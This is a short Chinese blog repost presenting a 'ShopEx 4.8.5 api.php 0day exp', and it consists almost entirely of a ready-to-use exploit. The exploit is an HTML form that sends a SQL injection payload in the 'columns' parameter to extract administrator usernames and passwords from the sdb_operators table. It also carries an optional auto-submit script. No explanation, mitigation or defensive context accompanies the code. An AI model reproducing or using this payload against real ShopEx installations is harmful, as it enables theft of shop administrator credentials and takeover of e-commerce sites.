shopex 4.8.5 api.php注入漏洞0day exp

暗月博客 2019年11月21日17:01:25评论497 views字数 331阅读1分6秒阅读模式
<form method='post' action='http://www.sysshell.com/api.php?act=search_dly_type&api_version=1.0'>      columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />      <input type='submit' value='submit' /><br />  </form>  <script>  //document.forms[0].submit()  </script>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日17:01:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   shopex 4.8.5 api.php注入漏洞0day exphttp://cn-sec.com/archives/71100.html

发表评论

匿名网友 填写信息